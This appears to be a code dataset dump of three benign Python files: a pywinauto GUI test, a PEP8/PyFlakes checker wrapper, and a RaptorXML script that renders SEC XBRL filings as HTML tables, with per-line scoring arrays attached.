# -*- coding: UTF-8 -*- # GUI Application automation and testing library # Copyright (C) 2006 Mark Mc Mahon # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public License # as published by the Free Software Foundation; either version 2.1 # of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. # See the GNU Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the # Free Software Foundation, Inc., # 59 Temple Place, # Suite 330, # Boston, MA 02111-1307 USA import time from pywinauto import application from pywinauto import tests def SakuraTest(): app = application.Application() app.start_(ur"\Program Files\sakura\sakura.exe") mainwin = app.window_(title_re = u'\(無題\) - sakura .*') # menu's from this application are not recovered well # but even with Japanese Regional settings they are not # rendered correctly by windows! # so using keys to select a menu item # open some dialog mainwin.TypeKeys("%OC") dlg = app.window_(title = u'共通設定') dlg.window_(title_re = ur"フリーカーソル.*").Click() dlg.MSDOS.Click() dlg.Cancel.Click() # quit the application mainwin.TypeKeys("%FX") def Main(): start = time.time() SakuraTest() print "Total time taken:", time.time() - start if __name__ == "__main__": Main()
[ "# -*- coding: UTF-8 -*-\r\n", "# GUI Application automation and testing library\r\n", "# Copyright (C) 2006 Mark Mc Mahon\r\n", "#\r\n", "# This library is free software; you can redistribute it and/or \r\n", "# modify it under the terms of the GNU Lesser General Public License \r\n", "# as published by the Free Software Foundation; either version 2.1 \r\n", "# of the License, or (at your option) any later version.\r\n", "#\r\n", "# This library is distributed in the hope that it will be useful, \r\n", "# but WITHOUT ANY WARRANTY; without even the implied warranty of \r\n", "# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. \r\n", "# See the GNU Lesser General Public License for more details.\r\n", "#\r\n", "# You should have received a copy of the GNU Lesser General Public \r\n", "# License along with this library; if not, write to the \r\n", "# Free Software Foundation, Inc.,\r\n", "# 59 Temple Place,\r\n", "# Suite 330, \r\n", "# Boston, MA 02111-1307 USA \r\n", "\r\n", "import time\r\n", "\r\n", "from pywinauto import application\r\n", "\r\n", "from pywinauto import tests\r\n", "\r\n", "\r\n", "def SakuraTest():\r\n", "\r\n", "\tapp = application.Application()\r\n", "\tapp.start_(ur\"\\Program Files\\sakura\\sakura.exe\")\r\n", "\t\r\n", "\tmainwin = app.window_(title_re = u'\\(無題\\) - sakura .*')\r\n", "\r\n", "\t# menu's from this application are not recovered well\r\n", "\t# but even with Japanese Regional settings they are not\r\n", "\t# rendered correctly by windows!\r\n", "\t# so using keys to select a menu item\r\n", "\r\n", "\t# open some dialog\r\n", "\tmainwin.TypeKeys(\"%OC\")\r\n", "\r\n", "\tdlg = app.window_(title = u'共通設定')\r\n", "\tdlg.window_(title_re = ur\"フリーカーソル.*\").Click()\r\n", "\tdlg.MSDOS.Click()\r\n", "\tdlg.Cancel.Click()\r\n", "\r\n", "\t# quit the application\r\n", "\tmainwin.TypeKeys(\"%FX\")\r\n", "\t\t\r\n", "\r\n", "\t\r\n", "def Main():\r\n", "\tstart = time.time()\r\n", "\t\r\n", "\tSakuraTest()\t\r\n", "\t\r\n", "\tprint \"Total time taken:\", time.time() - start\r\n", "\r\n", "if __name__ == \"__main__\":\r\n", "\tMain()" ]
[ 0, 0, 0, 0, 0.015151515151515152, 0.014084507042253521, 0.014492753623188406, 0, 0, 0.014705882352941176, 0.014925373134328358, 0.017543859649122806, 0, 0, 0.014492753623188406, 0.017241379310344827, 0, 0, 0.05555555555555555, 0.030303030303030304, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.029411764705882353, 0.0784313725490196, 0.6666666666666666, 0.08620689655172414, 0, 0.017857142857142856, 0.017241379310344827, 0.02857142857142857, 0.025, 0, 0.047619047619047616, 0.038461538461538464, 0, 0.08108108108108109, 0.0625, 0.05, 0.047619047619047616, 0, 0.04, 0.038461538461538464, 0.5, 0, 0.6666666666666666, 0.07692307692307693, 0.045454545454545456, 0.6666666666666666, 0.125, 0.6666666666666666, 0.02040816326530612, 0, 0.03571428571428571, 0.2857142857142857 ]
62
0.075046
false
#!/usr/bin/env python # coding:utf-8 "Integration of several python code checkers" __author__ = "Mariano Reingart (reingart@gmail.com)" __copyright__ = "Copyright (C) 2011 Mariano Reingart" __license__ = "GPL 3.0" import os import compiler import _ast import pep8 import pyflakes.checker # PEP8 Coding Standar class PEP8(pep8.Checker): def __init__(self, filename, lines=None): self.errors = [] pep8style = pep8.StyleGuide(parse_argv=False, config_file=False) options = pep8style.options options.prog = os.path.basename(filename) options.exclude = [] options.filename = filename options.select = [] options.ignore = [] options.verbose = 0 #options.ignore = pep8.DEFAULT_IGNORE.split(',') options.counters = {'physical lines': 0, 'logical lines': 0,} options.messages = {} pep8.Checker.__init__(self, filename) self.check_all() def report_error(self, line_number, offset, text, check): filename = self.filename error = dict(summary=text, type=30, filename=filename, lineno=line_number, offset=offset+1) self.errors.append(error) def __iter__(self): for error in self.errors: yield error # PyFlakes Sanity Checks class PyFlakes(object): def __init__(self, filename): code_string = open(filename).read() tree = compile(code_string, filename, "exec", _ast.PyCF_ONLY_AST) self.checker = pyflakes.checker.Checker(tree, filename) self.checker.messages.sort(lambda a, b: cmp(a.lineno, b.lineno)) def __iter__(self): for msg in self.checker.messages: filename = msg.filename text = msg.message % msg.message_args lineno = msg.lineno error = dict(summary=text, type=40, filename=filename, lineno=lineno, offset=1) yield error def check(filename): "Try all available checkers and return all defects founds" for defect in PEP8(filename): yield defect for defect in PyFlakes(filename): yield defect if __name__ == '__main__': for e in check("hola.py"): print e
[ "#!/usr/bin/env python\r\n", "# coding:utf-8\r\n", "\r\n", "\"Integration of several python code checkers\"\r\n", "\r\n", "__author__ = \"Mariano Reingart (reingart@gmail.com)\"\r\n", "__copyright__ = \"Copyright (C) 2011 Mariano Reingart\"\r\n", "__license__ = \"GPL 3.0\"\r\n", "\r\n", "import os\r\n", "import compiler\r\n", "import _ast\r\n", "\r\n", "import pep8\r\n", "import pyflakes.checker\r\n", "\r\n", "\r\n", "# PEP8 Coding Standar\r\n", "\r\n", "class PEP8(pep8.Checker):\r\n", " def __init__(self, filename, lines=None):\r\n", " self.errors = []\r\n", " pep8style = pep8.StyleGuide(parse_argv=False, config_file=False)\r\n", " options = pep8style.options\r\n", " options.prog = os.path.basename(filename)\r\n", " options.exclude = []\r\n", " options.filename = filename\r\n", " options.select = []\r\n", " options.ignore = []\r\n", " options.verbose = 0\r\n", " #options.ignore = pep8.DEFAULT_IGNORE.split(',')\r\n", " options.counters = {'physical lines': 0, 'logical lines': 0,}\r\n", " options.messages = {}\r\n", " pep8.Checker.__init__(self, filename)\r\n", " self.check_all()\r\n", "\r\n", " def report_error(self, line_number, offset, text, check):\r\n", " filename = self.filename\r\n", " error = dict(summary=text, type=30, \r\n", " filename=filename, lineno=line_number, offset=offset+1)\r\n", " self.errors.append(error)\r\n", " \r\n", " def __iter__(self):\r\n", " for error in self.errors:\r\n", " yield error\r\n", "\r\n", "\r\n", "# PyFlakes Sanity Checks\r\n", "\r\n", "class PyFlakes(object):\r\n", "\r\n", " def __init__(self, filename):\r\n", " code_string = open(filename).read()\r\n", " tree = compile(code_string, filename, \"exec\", _ast.PyCF_ONLY_AST)\r\n", " self.checker = pyflakes.checker.Checker(tree, filename)\r\n", " self.checker.messages.sort(lambda a, b: cmp(a.lineno, b.lineno))\r\n", "\r\n", " def __iter__(self):\r\n", " for msg in self.checker.messages:\r\n", " filename = msg.filename\r\n", " text = msg.message % msg.message_args\r\n", " lineno = msg.lineno\r\n", " error = dict(summary=text, type=40, \r\n", " filename=filename, lineno=lineno, offset=1)\r\n", " yield error\r\n", "\r\n", "\r\n", "\r\n", "def check(filename):\r\n", " \"Try all available checkers and return all defects founds\"\r\n", " for defect in PEP8(filename):\r\n", " yield defect\r\n", " for defect in PyFlakes(filename):\r\n", " yield defect\r\n", " \r\n", " \r\n", "if __name__ == '__main__':\r\n", " for e in check(\"hola.py\"):\r\n", " print e\r\n", "\r\n", " \r\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.017241379310344827, 0.014084507042253521, 0, 0, 0, 0, 0, 0, 0.021739130434782608, 0, 0, 0.1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02, 0, 0, 0, 0, 0, 0.045454545454545456, 0, 0, 0, 0, 0, 0.16666666666666666, 0.1, 0, 0, 0, 0, 0.16666666666666666 ]
81
0.008048
false
# Copyright 2015 Altova GmbH # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. __copyright__ = "Copyright 2015-2017 Altova GmbH" __license__ = 'http://www.apache.org/licenses/LICENSE-2.0' # This script generates HTML reports from a SEC EDGAR filing. # # Example invocation: # raptorxmlxbrl valxbrl --script=sec_filing_to_html.py nanonull.xbrl import os, datetime, itertools, builtins from altova import * lang='en-US' def isPeriodStart(role): return role in ( 'http://www.xbrl.org/2003/role/periodStartLabel', 'http://xbrl.us/us-gaap/role/label/negatedPeriodStart', 'http://www.xbrl.org/2009/role/negatedPeriodStartLabel' ) def isPeriodEnd(role): return role in ( 'http://www.xbrl.org/2003/role/periodEndLabel', 'http://xbrl.us/us-gaap/role/label/negatedPeriodEnd', 'http://www.xbrl.org/2009/role/negatedPeriodEndLabel' ) def isTotal(role): return role in ( 'http://www.xbrl.org/2003/role/totalLabel', 'http://xbrl.us/us-gaap/role/label/negatedTotal', 'http://www.xbrl.org/2009/role/negatedTotalLabel' ) def isNegated(role): return role in ( 'http://xbrl.us/us-gaap/role/label/negated', 'http://www.xbrl.org/2009/role/negatedLabel', 'http://www.xbrl.org/2009/role/negatedNetLabel', 'http://xbrl.us/us-gaap/role/label/negatedPeriodEnd', 'http://www.xbrl.org/2009/role/negatedPeriodEndLabel', 'http://xbrl.us/us-gaap/role/label/negatedPeriodStart', 'http://www.xbrl.org/2009/role/negatedPeriodStartLabel', 'http://www.xbrl.org/2009/role/negatedTerseLabel', 'http://xbrl.us/us-gaap/role/label/negatedTotal', 'http://www.xbrl.org/2009/role/negatedTotalLabel' ) def domainMembersFromPresentationTreeRecursive(network,parent,domain_members): for rel in network.relationships_from(parent): domain_members.append(rel.target) domainMembersFromPresentationTreeRecursive(network,rel.target,domain_members) def conceptsFromPresentationTreeRecursive(network,parent,concepts): for rel in network.relationships_from(parent): if not rel.target.abstract: concepts.append((rel.target,rel.preferred_label)) conceptsFromPresentationTreeRecursive(network,rel.target,concepts) def analyzePresentationTree(network,roots): concepts = [] dimensions = {} for rel in network.relationships_from(roots[0]): if isinstance(rel.target,xbrl.xdt.Hypercube): for rel2 in network.relationships_from(rel.target): if isinstance(rel2.target,xbrl.xdt.Dimension): domainMembersFromPresentationTreeRecursive(network,rel2.target,dimensions.setdefault(rel2.target,[])) else: conceptsFromPresentationTreeRecursive(network,rel2.target,concepts) else: conceptsFromPresentationTreeRecursive(network,rel.target,concepts) return concepts, dimensions def calcTableData(instance,role,contexts,concepts,dimensions): table = {'columns': [], 'height': len(concepts)} bIsCashFlow = 'cash' in role[1].lower() and 'flow' in role[1].lower() for context in contexts: cs = xbrl.ConstraintSet(context) period = cs[xbrl.Aspect.PERIOD] dimension_aspects = [value for aspect,value in cs.items() if isinstance(aspect,xbrl.xdt.Dimension)] bEliminate = False for val in dimension_aspects: domain = dimensions.get(val.dimension,None) if not domain or val.value not in domain: bEliminate = True for dim in set(dimensions.keys())-set([value.dimension for value in dimension_aspects]): if dim.default_member and dim.default_member not in dimensions[dim]: bEliminate = True if bEliminate: continue bEmpty = True bHasCash = False column = {'period': period, 'dimensions': dimension_aspects, 'rows': []} for concept in concepts: cs[xbrl.Aspect.CONCEPT] = concept[0] if isPeriodStart(concept[1]): if period.period_type == xbrl.PeriodType.START_END: cs[xbrl.Aspect.PERIOD] = xbrl.PeriodAspectValue.from_instant(period.start) else: column['rows'].append({'concept': concept, 'facts': xbrl.FactSet()}) continue elif isPeriodEnd(concept[1]): if period.period_type == xbrl.PeriodType.START_END: cs[xbrl.Aspect.PERIOD] = xbrl.PeriodAspectValue.from_instant(period.end) else: column['rows'].append({'concept': concept, 'facts': xbrl.FactSet()}) continue else: cs[xbrl.Aspect.PERIOD] = period facts = instance.facts.filter(cs,allow_additional_dimensions=False) if len(facts): bEmpty = False if bIsCashFlow and not bHasCash and concept[0].is_duration(): bHasCash = 'cash' in next(iter(concept[0].labels(label_role=concept[1],lang=lang))).text.lower() column['rows'].append({'concept': concept, 'facts': facts}) if not bEmpty and (not bIsCashFlow or bHasCash): table['columns'].append(column) return table def formatConcept(concept): preferredLabel = concept[1] if concept[1] else 'http://www.xbrl.org/2003/role/label' labels = list(concept[0].labels(label_role=preferredLabel,lang=lang)) if labels: return labels[0].text return str(concept[0].qname) def formatUnit(unit): numerators = list(unit.numerator_measures) denumerators = list(unit.denominator_measures) if len(numerators) == 1 and len(denumerators) == 0: if numerators[0] == xml.QName('USD','http://www.xbrl.org/2003/iso4217'): return '$' elif numerators[0] == xml.QName('EUR','http://www.xbrl.org/2003/iso4217'): return '€' numerator = ','.join([qname.local_name for qname in numerators]) denominator = ','.join([qname.local_name for qname in denominators]) if denominator: return numerator+'/'+denominator return numerator def formatDimensionValue(dimValue): return formatConcept((dimValue.value,'http://www.xbrl.org/2003/role/terseLabel')) def formatFact(fact,preferredLabel): if fact.xsi_nil: return 'nil' elif fact.concept.is_numeric(): val = fact.effective_numeric_value if preferredLabel and 'negated' in preferredLabel: val *= -1 if val < 0: return '(%s)' % str(abs(val)) return str(val) elif fact.concept.is_fraction(): return str(fact.fraction_value) else: return fact.normalized_value def formatDate(date): return date.strftime('%b. %d, %Y') def getDuration(column): p = column['period'] if p.period_type == xbrl.PeriodType.INSTANT: return 0 return (p.end.year - p.start.year) * 12 + p.end.month - p.start.month def getEndDate(column): p = column['period'] if p.period_type == xbrl.PeriodType.INSTANT: return p.instant return p.end def generateTable(file, role, table): columns = sorted(table['columns'],key=lambda x: (-getDuration(x),getEndDate(x)),reverse=True) file.write('<hr/>\n') file.write('<a name="table_%s"/>\n' % role[1].split(' - ')[0]) file.write('<table>\n') file.write('<caption>') file.write(role[1]) file.write('</caption>\n') file.write('<thead>\n') bHasDurations = False for duration, group in itertools.groupby(columns,key=getDuration): if duration > 0: bHasDurations = True file.write('<tr>\n') file.write('<th rowspan="%d"></th>\n' % (2 if bHasDurations else 1)) if bHasDurations: for duration, group in itertools.groupby(columns,key=getDuration): cols = list(group) file.write('<th colspan="%d">\n' % len(cols)) if duration > 0: file.write('<p class="label">%d Months Ended</p>\n' % getDuration(cols[0])) file.write('</th>\n') file.write('</tr>\n') file.write('<tr>\n') for column in columns: file.write('<th>\n') file.write('<p class="label">%s</p>\n' % formatDate(getEndDate(column)-datetime.timedelta(days=1))) for dimValue in column['dimensions']: dimLabel = formatDimensionValue(dimValue) if '[Domain]' not in dimLabel: file.write('<p class="label">%s</p>\n' % dimLabel) file.write('</th>\n') file.write('</tr>\n') file.write('</thead>\n') file.write('<tbody>\n') footnotes = {} for row in range(table['height']): concept = columns[0]['rows'][row]['concept'] file.write('<tr>\n') file.write('<th>%s</th>\n' % formatConcept(concept)) for column in columns: file.write('<td>') for fact in column['rows'][row]['facts']: file.write('<p class="fact">%s' % formatFact(fact,concept[1])) for footnote in fact.footnotes(lang=lang): index = footnotes.setdefault(footnote, len(footnotes)+1) file.write('<a href="#table_%s_footnote_%d"><span class="footnoteRef">[%d]</span></a>' % (role[1].split(' - ')[0],index,index)) file.write('</p>\n') file.write('</td>\n') file.write('</tr>\n') file.write('</tbody>\n') file.write('</table>\n') for (footnote,index) in sorted(footnotes.items(),key=lambda footnote: footnote[1]): file.write('<a name="table_%s_footnote_%d"><p class="footnote">[%d] %s</p></a>\n' % (role[1].split(' - ')[0],index,index,footnote.text)) def generateTables(file, dts, instance): file.write("""<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta charset="utf-8"/> <style type="text/css"> .error { color: red } .footnoteRef { font-size: 70%; vertical-align: top;} table { border-collapse:collapse; border: 0.22em solid black; background-color: white; color: black;} caption {font-size: 150%} td, th { border-left: 0.1em solid black; border-left: 0.1em solid black; border-top: 0.1em solid black; padding: 0.5em; text-align: center; } thead tr th.rollup { border-top-style: none; } tbody tr th.rollup { border-left-style: none; } tbody tr:nth-of-type(even) { background-color: #EAEFFF; } thead, tbody tr th { background-color: #C6D8FF; } thead { border-bottom: 0.19em solid black; } thead tr:first-of-type th:first-of-type, tbody tr th:last-of-type { border-right: 0.18em solid black; } </style> </head> <body> """) # Calculate table data tables = {} contexts = list(instance.contexts) roles = [(role, dts.role_type(role).definition.value) for role in dts.presentation_link_roles()] roles = sorted(roles, key=lambda role: role[1].split(' - ')[0]) for role in roles: presentation_network = dts.presentation_base_set(role[0]).network_of_relationships() roots = list(presentation_network.roots) tables[role] = calcTableData(instance,role,contexts,*analyzePresentationTree(presentation_network,roots)) # Generate table index for role in roles: if tables[role]['columns']: file.write('<h4><a href="#table_%s">%s</a></h4>\n' % (role[1].split(' - ')[0], role[1])) # Generate html rendering of each non-empty table for role in roles: if tables[role]['columns']: generateTable(file, role, tables[role]) # Main entry point, will be called by RaptorXML after the XBRL instance validation job has finished def on_xbrl_finished(job, instance): # instance object will be None if XBRL 2.1 validation was not successful if instance: path = os.path.join(job.output_dir,'table.html') with builtins.open(path,mode='w',newline='') as file: generateTables(file, instance.dts, instance) # Register new output file with RaptorXML engine job.append_output_filename(path)
[ "# Copyright 2015 Altova GmbH\n", "# \n", "# Licensed under the Apache License, Version 2.0 (the \"License\");\n", "# you may not use this file except in compliance with the License.\n", "# You may obtain a copy of the License at\n", "# \n", "# http://www.apache.org/licenses/LICENSE-2.0\n", "# \n", "# Unless required by applicable law or agreed to in writing, software\n", "# distributed under the License is distributed on an \"AS IS\" BASIS,\n", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n", "# See the License for the specific language governing permissions and\n", "# limitations under the License.\n", "__copyright__ = \"Copyright 2015-2017 Altova GmbH\"\n", "__license__ = 'http://www.apache.org/licenses/LICENSE-2.0'\n", "\n", "# This script generates HTML reports from a SEC EDGAR filing.\n", "#\n", "# Example invocation:\n", "# raptorxmlxbrl valxbrl --script=sec_filing_to_html.py nanonull.xbrl\n", "\n", "import os, datetime, itertools, builtins\n", "from altova import *\n", "\n", "lang='en-US'\n", "\n", "def isPeriodStart(role):\n", " return role in (\n", " 'http://www.xbrl.org/2003/role/periodStartLabel',\n", " 'http://xbrl.us/us-gaap/role/label/negatedPeriodStart',\n", " 'http://www.xbrl.org/2009/role/negatedPeriodStartLabel'\n", " )\n", "def isPeriodEnd(role):\n", " return role in (\n", " 'http://www.xbrl.org/2003/role/periodEndLabel',\n", " 'http://xbrl.us/us-gaap/role/label/negatedPeriodEnd',\n", " 'http://www.xbrl.org/2009/role/negatedPeriodEndLabel'\n", " )\n", "def isTotal(role):\n", " return role in (\n", " 'http://www.xbrl.org/2003/role/totalLabel',\n", " 'http://xbrl.us/us-gaap/role/label/negatedTotal',\n", " 'http://www.xbrl.org/2009/role/negatedTotalLabel'\n", " )\n", "def isNegated(role):\n", " return role in (\n", " 'http://xbrl.us/us-gaap/role/label/negated',\n", " 'http://www.xbrl.org/2009/role/negatedLabel',\n", " 'http://www.xbrl.org/2009/role/negatedNetLabel',\n", " 'http://xbrl.us/us-gaap/role/label/negatedPeriodEnd',\n", " 'http://www.xbrl.org/2009/role/negatedPeriodEndLabel',\n", " 'http://xbrl.us/us-gaap/role/label/negatedPeriodStart',\n", " 'http://www.xbrl.org/2009/role/negatedPeriodStartLabel',\n", " 'http://www.xbrl.org/2009/role/negatedTerseLabel',\n", " 'http://xbrl.us/us-gaap/role/label/negatedTotal',\n", " 'http://www.xbrl.org/2009/role/negatedTotalLabel'\n", " )\n", " \n", "def domainMembersFromPresentationTreeRecursive(network,parent,domain_members):\n", " for rel in network.relationships_from(parent):\n", " domain_members.append(rel.target)\n", " domainMembersFromPresentationTreeRecursive(network,rel.target,domain_members)\n", " \n", "def conceptsFromPresentationTreeRecursive(network,parent,concepts):\n", " for rel in network.relationships_from(parent):\n", " if not rel.target.abstract:\n", " concepts.append((rel.target,rel.preferred_label))\n", " conceptsFromPresentationTreeRecursive(network,rel.target,concepts)\n", "\n", "def analyzePresentationTree(network,roots):\n", " concepts = []\n", " dimensions = {}\n", " for rel in network.relationships_from(roots[0]):\n", " if isinstance(rel.target,xbrl.xdt.Hypercube):\n", " for rel2 in network.relationships_from(rel.target):\n", " if isinstance(rel2.target,xbrl.xdt.Dimension):\n", " domainMembersFromPresentationTreeRecursive(network,rel2.target,dimensions.setdefault(rel2.target,[])) \n", " else:\n", " conceptsFromPresentationTreeRecursive(network,rel2.target,concepts)\n", " else:\n", " conceptsFromPresentationTreeRecursive(network,rel.target,concepts)\n", " return concepts, dimensions\n", "\n", "def calcTableData(instance,role,contexts,concepts,dimensions):\n", " table = {'columns': [], 'height': len(concepts)}\n", "\n", " bIsCashFlow = 'cash' in role[1].lower() and 'flow' in role[1].lower()\n", " \n", " for context in contexts:\n", " cs = xbrl.ConstraintSet(context)\n", " period = cs[xbrl.Aspect.PERIOD]\n", " dimension_aspects = [value for aspect,value in cs.items() if isinstance(aspect,xbrl.xdt.Dimension)]\n", " bEliminate = False\n", " for val in dimension_aspects:\n", " domain = dimensions.get(val.dimension,None)\n", " if not domain or val.value not in domain:\n", " bEliminate = True\n", " for dim in set(dimensions.keys())-set([value.dimension for value in dimension_aspects]):\n", " if dim.default_member and dim.default_member not in dimensions[dim]:\n", " bEliminate = True\n", " if bEliminate:\n", " continue \n", " \n", " bEmpty = True\n", " bHasCash = False\n", " column = {'period': period, 'dimensions': dimension_aspects, 'rows': []} \n", " for concept in concepts:\n", " cs[xbrl.Aspect.CONCEPT] = concept[0]\n", " if isPeriodStart(concept[1]):\n", " if period.period_type == xbrl.PeriodType.START_END:\n", " cs[xbrl.Aspect.PERIOD] = xbrl.PeriodAspectValue.from_instant(period.start)\n", " else:\n", " column['rows'].append({'concept': concept, 'facts': xbrl.FactSet()})\n", " continue\n", " elif isPeriodEnd(concept[1]):\n", " if period.period_type == xbrl.PeriodType.START_END:\n", " cs[xbrl.Aspect.PERIOD] = xbrl.PeriodAspectValue.from_instant(period.end)\n", " else:\n", " column['rows'].append({'concept': concept, 'facts': xbrl.FactSet()})\n", " continue\n", " else:\n", " cs[xbrl.Aspect.PERIOD] = period\n", " \n", " facts = instance.facts.filter(cs,allow_additional_dimensions=False)\n", " if len(facts):\n", " bEmpty = False\n", " if bIsCashFlow and not bHasCash and concept[0].is_duration():\n", " bHasCash = 'cash' in next(iter(concept[0].labels(label_role=concept[1],lang=lang))).text.lower()\n", " column['rows'].append({'concept': concept, 'facts': facts})\n", "\n", " if not bEmpty and (not bIsCashFlow or bHasCash):\n", " table['columns'].append(column)\n", " \n", " return table\n", "\n", "def formatConcept(concept):\n", " preferredLabel = concept[1] if concept[1] else 'http://www.xbrl.org/2003/role/label'\n", " labels = list(concept[0].labels(label_role=preferredLabel,lang=lang))\n", " if labels:\n", " return labels[0].text\n", " return str(concept[0].qname)\n", "\n", "def formatUnit(unit):\n", " numerators = list(unit.numerator_measures)\n", " denumerators = list(unit.denominator_measures)\n", " if len(numerators) == 1 and len(denumerators) == 0:\n", " if numerators[0] == xml.QName('USD','http://www.xbrl.org/2003/iso4217'):\n", " return '$'\n", " elif numerators[0] == xml.QName('EUR','http://www.xbrl.org/2003/iso4217'):\n", " return '€'\n", " numerator = ','.join([qname.local_name for qname in numerators])\n", " denominator = ','.join([qname.local_name for qname in denominators])\n", " if denominator:\n", " return numerator+'/'+denominator\n", " return numerator\n", " \n", "def formatDimensionValue(dimValue):\n", " return formatConcept((dimValue.value,'http://www.xbrl.org/2003/role/terseLabel'))\n", " \n", "def formatFact(fact,preferredLabel):\n", " if fact.xsi_nil:\n", " return 'nil'\n", " elif fact.concept.is_numeric():\n", " val = fact.effective_numeric_value\n", " if preferredLabel and 'negated' in preferredLabel:\n", " val *= -1\n", " if val < 0:\n", " return '(%s)' % str(abs(val))\n", " return str(val)\n", " elif fact.concept.is_fraction():\n", " return str(fact.fraction_value)\n", " else:\n", " return fact.normalized_value\n", "\n", "def formatDate(date):\n", " return date.strftime('%b. %d, %Y')\n", " \n", "def getDuration(column):\n", " p = column['period']\n", " if p.period_type == xbrl.PeriodType.INSTANT:\n", " return 0\n", " return (p.end.year - p.start.year) * 12 + p.end.month - p.start.month\n", "\n", "def getEndDate(column):\n", " p = column['period']\n", " if p.period_type == xbrl.PeriodType.INSTANT:\n", " return p.instant\n", " return p.end\n", " \n", "def generateTable(file, role, table):\n", " columns = sorted(table['columns'],key=lambda x: (-getDuration(x),getEndDate(x)),reverse=True)\n", " \n", " file.write('<hr/>\\n')\n", " file.write('<a name=\"table_%s\"/>\\n' % role[1].split(' - ')[0])\n", " file.write('<table>\\n')\n", "\n", " file.write('<caption>')\n", " file.write(role[1])\n", " file.write('</caption>\\n')\n", " \n", " file.write('<thead>\\n')\n", "\n", " bHasDurations = False\n", " for duration, group in itertools.groupby(columns,key=getDuration):\n", " if duration > 0:\n", " bHasDurations = True \n", " \n", " file.write('<tr>\\n')\n", " file.write('<th rowspan=\"%d\"></th>\\n' % (2 if bHasDurations else 1))\n", " if bHasDurations:\n", " for duration, group in itertools.groupby(columns,key=getDuration):\n", " cols = list(group)\n", " file.write('<th colspan=\"%d\">\\n' % len(cols))\n", " if duration > 0:\n", " file.write('<p class=\"label\">%d Months Ended</p>\\n' % getDuration(cols[0]))\n", " file.write('</th>\\n')\n", " file.write('</tr>\\n') \n", " file.write('<tr>\\n')\n", " for column in columns:\n", " file.write('<th>\\n')\n", " file.write('<p class=\"label\">%s</p>\\n' % formatDate(getEndDate(column)-datetime.timedelta(days=1)))\n", " for dimValue in column['dimensions']:\n", " dimLabel = formatDimensionValue(dimValue)\n", " if '[Domain]' not in dimLabel:\n", " file.write('<p class=\"label\">%s</p>\\n' % dimLabel)\n", " file.write('</th>\\n')\n", " file.write('</tr>\\n')\n", " file.write('</thead>\\n')\n", "\n", " file.write('<tbody>\\n')\n", " footnotes = {}\n", " for row in range(table['height']):\n", " concept = columns[0]['rows'][row]['concept']\n", " file.write('<tr>\\n')\n", " file.write('<th>%s</th>\\n' % formatConcept(concept))\n", " for column in columns:\n", " file.write('<td>')\n", " for fact in column['rows'][row]['facts']:\n", " file.write('<p class=\"fact\">%s' % formatFact(fact,concept[1]))\n", " for footnote in fact.footnotes(lang=lang):\n", " index = footnotes.setdefault(footnote, len(footnotes)+1)\n", " file.write('<a href=\"#table_%s_footnote_%d\"><span class=\"footnoteRef\">[%d]</span></a>' % (role[1].split(' - ')[0],index,index))\n", " file.write('</p>\\n')\n", " file.write('</td>\\n')\n", " file.write('</tr>\\n')\n", " file.write('</tbody>\\n')\n", " \n", " file.write('</table>\\n')\n", " \n", " for (footnote,index) in sorted(footnotes.items(),key=lambda footnote: footnote[1]):\n", " file.write('<a name=\"table_%s_footnote_%d\"><p class=\"footnote\">[%d] %s</p></a>\\n' % (role[1].split(' - ')[0],index,index,footnote.text))\n", " \n", "def generateTables(file, dts, instance):\n", " file.write(\"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?>\n", "<!DOCTYPE html>\n", "<html xmlns=\"http://www.w3.org/1999/xhtml\">\n", "<head>\n", "<meta charset=\"utf-8\"/>\n", "<style type=\"text/css\">\n", ".error { color: red }\n", ".footnoteRef { font-size: 70%; vertical-align: top;}\n", "table { border-collapse:collapse; border: 0.22em solid black; background-color: white; color: black;} \n", "caption {font-size: 150%}\n", "td, th { border-left: 0.1em solid black; border-left: 0.1em solid black; border-top: 0.1em solid black; padding: 0.5em; text-align: center; } \n", "thead tr th.rollup { border-top-style: none; } \n", "tbody tr th.rollup { border-left-style: none; } \n", "tbody tr:nth-of-type(even) { background-color: #EAEFFF; } \n", "thead, tbody tr th { background-color: #C6D8FF; } \n", "thead { border-bottom: 0.19em solid black; } \n", "thead tr:first-of-type th:first-of-type, tbody tr th:last-of-type { border-right: 0.18em solid black; } \n", "</style>\n", "</head>\n", "<body>\n", "\"\"\")\n", "\n", " # Calculate table data\n", " tables = {}\n", " contexts = list(instance.contexts)\n", " roles = [(role, dts.role_type(role).definition.value) for role in dts.presentation_link_roles()]\n", " roles = sorted(roles, key=lambda role: role[1].split(' - ')[0])\n", " for role in roles:\n", " presentation_network = dts.presentation_base_set(role[0]).network_of_relationships()\n", " roots = list(presentation_network.roots)\n", " tables[role] = calcTableData(instance,role,contexts,*analyzePresentationTree(presentation_network,roots))\n", "\n", " # Generate table index\n", " for role in roles:\n", " if tables[role]['columns']:\n", " file.write('<h4><a href=\"#table_%s\">%s</a></h4>\\n' % (role[1].split(' - ')[0], role[1])) \n", "\n", " # Generate html rendering of each non-empty table\n", " for role in roles:\n", " if tables[role]['columns']:\n", " generateTable(file, role, tables[role])\n", "\n", "# Main entry point, will be called by RaptorXML after the XBRL instance validation job has finished\n", "def on_xbrl_finished(job, instance):\n", " # instance object will be None if XBRL 2.1 validation was not successful\n", " if instance:\n", " path = os.path.join(job.output_dir,'table.html')\n", " with builtins.open(path,mode='w',newline='') 